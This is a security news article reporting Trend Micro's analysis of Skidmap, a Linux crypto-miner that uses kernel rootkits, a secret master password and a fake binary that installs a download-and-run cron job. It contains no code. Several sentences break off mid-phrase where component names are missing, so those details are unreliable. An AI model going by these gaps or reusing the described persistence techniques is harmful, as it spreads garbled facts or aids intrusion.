This malware outstands similar miners because of the way it loads malicious kernel modules to evade the detection.
The crypto-miner set up a secret master password that uses to access any user account on the system.
“These kernel-mode rootkits are not only more difficult to detect compared to its user-mode counterparts — attackers can also use them to gain unfettered access to the affected system. A case in point: the way Skidmap can also set up a secret master password that gives it access to any user account in the system.” states the analysis published by TrendMicro. “Conversely, given that many of Skidmap’s routines require root access, the attack vector that Skidmap uses — whether through exploits, misconfigurations, or exposure to the internet — are most likely the same ones that provide the attacker root or administrative access to the system.”
Experts noticed that several routines implemented by Skidmap require root access, suggesting that its attack vector is the same that provided the attackers with root or administrative access to the system.
The infection chain sees the Skidmap miner installing
“Besides the backdoor access, Skidmap also creates another way for its operators
The main binary checks whether the system runs on Debian or RHEL/CentOS, then drops the miner and other for the specific Linux distro.
Trend Micro experts revealed that the Skidmap miner has notable components designed to obfuscate its activities and ensure that they continue to run. Samples of these components are:
A fake “” binary that replaces the original, once executed it will randomly set up a malicious cron job to download and execute a file.
Another component is “
Trend Micro also described the “
The last component is “
(SecurityAffairs – Skidmap miner, Linux)
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.